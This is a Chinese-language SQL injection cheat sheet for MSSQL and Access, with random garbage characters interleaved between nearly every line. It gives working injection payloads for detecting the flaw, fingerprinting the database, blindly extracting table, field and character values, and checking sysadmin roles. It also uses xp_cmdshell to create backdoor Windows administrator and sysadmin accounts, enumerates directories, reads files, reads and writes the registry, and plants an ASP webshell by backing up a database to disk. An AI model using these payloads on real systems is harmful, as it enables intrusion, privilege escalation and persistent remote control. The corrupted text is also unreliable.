1.判断是否有注入;and 1=1 ;and 1=2 �^�`B##9g~
2.初步判断是否是mssql ;and user>0 �d"e%�tsj�
+p%5/�smfs
3.注入参数是字符'and [查询条件] and ''=' �#�xJGuYdv
R)�DNF��c:
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 8� MACbLY
Ke;X3�j ]`
5.判断数据库系统 m}'t'l�4 c
UHsrZgIRYT
;and (select count(*) from sysobjects)>0 mssql o )}��<��
!xx�>�
lX5
;and (select count(*) from msysobjects)>0 access \�p=W4W/�
�_|5�F��rN
~_^o?N��E,
Yqz[�sz5+m
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ky
lr��f4=
^|hRu{Q�W�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 z)?#UdBQv
%N�AFU��/&
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 X6"^:�)&1M
�y��AD�N_
9.(1)猜字段的ascii值(access) (�w�@MlM�k
eL$U���� M
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Osvz 3UMY3
(^s&#_w03
(2)猜字段的ascii值(mssql) PU�/�Br;2A
"3K�Smb� �
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ^5'/ }iR2N
O%q;,w{prW
10.测试权限结构(mssql) O|7{%5�h�
N�s(L1�'9=
Vlxb<$5Nh�
yPxG`�w�'�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- bQ\�-6dOtv
g,G�baaXH�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- q� MT.7n:�
-GkK[KC�H
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- #SLxN��AH�
Pk?%PB��?Z
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- FsP�DWy�&x
�4�+�?ZTc(
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 6�L�`�+�z
g�p&&
c,�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- \e�Sk�7�C
�Hpo?|;3D5
;and 1=(select IS_MEMBER('db_owner'));-- }+R�F~�~H/
oJ;�O>J@�c
�3K��20f8g
w��)y9�!li
11.添加mssql和系统的帐户 ��� _I}�L$
��gBi�QIhz
;exec master.dbo.sp_addlogin username;-- r(2��'�0JQ
;exec master.dbo.sp_password null,username,password;-- :�R*^I�zs=
���UE$[;Zg
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- !�7a�^�8
�
����'?>O�
;exec master.dbo.xp_cmdshell 'net user username password 6Cv2>�'{�S
"qP�^uno��
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- P+%)0*�W��
0�j�Z�{�?�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- E[�"t� Ccg
V<7K!�<g)b
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- n#L2cv~Aj"
@p` C��AB�
JE:n`�l�/p
za�m0(�^�=
12.(1)遍历目录 g�l\$jDC9�
E `j5y(44�
;create table dirs(paths varchar(100), id int) /$.vHt�5nt
�@� �un�
;insert dirs exec master.dbo.xp_dirtree 'c:\' ;�gu�>�;�_
_x|8�U'|Ce
;and (select top 1 paths from dirs)>0 a4qpn�r]0�
�sluZ-,z�E
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) j[Zn�i���D
xW;[}�t-QS
G~hI��LW^�
�> ��FcA�,
(2)遍历目录 wj��5s5dH
cyP*�Q�W�[
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- q�sR�fG~Cg
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 "91At�b;hJ
W]Y!�ZfGnN
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �LW
3J$A�m
`L[32�B9��
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 k�@)m�-��K
=v`&i�L�~m
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 y��^|�3]G3
j%y+W{�Q[
l
)�V���43
K���XbYv62
13.mssql中的存储过程 �adr^6n6�v
F$y��F���R
xp_regenumvalues 注册表根键, 子键 h�� �\�cK�
0BP�~���0z
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �|
xI_aYv*
}���fMFQA)
xp_regread 根键,子键,键值名 dv��}R]f'�
Bv�]wHP�un
;exec xp_regread Y},GZ�^zqy
Y'H/
$�M N
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 xdU
pp~}+.
3rd�xX�mx�
xp_regwrite 根键,子键, 值名, 值类型, 值 5$Q`P',*Ua
%c2i.E/G�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ��"�/�-v 9
�x]+KO)�I
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Y�+yvv{0�1
�n�.UM+�2G
xp_regdeletevalue 根键,子键,值名 >#n-4NZ;p9
ZO6bG$y6�4
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 @z JZoJL]J
E�_uH'��E�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ��jy|xDQ�
s�s�byvzQ�
MW�@�b�;=(
$,#IPoi~�X
14.mssql的backup创建webshell =0fx���6V�
9�59j��p85
use model <l/�Qf[��V
s/�0F�Sv
x
create table cmd(str image); �>�:nJ��Tr
}'�v��?�Qq
insert into cmd(str) values (''); �F9J9�pgVP
N�^`E�fpvg
backup database model to disk='c:\l.asp'; �,lYU�#Hx*
&L`p��4�AZ
y'wW2U/�1-
KCT"a��:\
15.mssql内置函数 "�A`'~]/hE
:%]R x&�08
;and (select @@version)>0 获得Windows的版本号 uQ+$Hz�x�X
19`0)pzZ*P
;and user_name()='dbo' 判断当前系统的连接用户是不是sa J�N-8\��L
' ��*�C)S�
;and (select user_name())>0 爆当前系统的连接用户 �\�eN/fTPm
0DT2q�M�[,
;and (select db_name())>0 得到当前连接的数据库 �Px&Mi:4tG
<�$6�E� r�
*0n�tx$M-w
�_u5U> w��
16.简洁的webshell F�>R)�~;Ja
��+��N&(lj
use model � :!FwF�65
<q=�B(J�'�
create table cmd(str image); �,��.F+�x}
[�M>_(u6�
insert into cmd(str) values (''); �[+7X�&�B
7)wq9];�w
backup database model to disk='g:\wwwtest\l.asp';
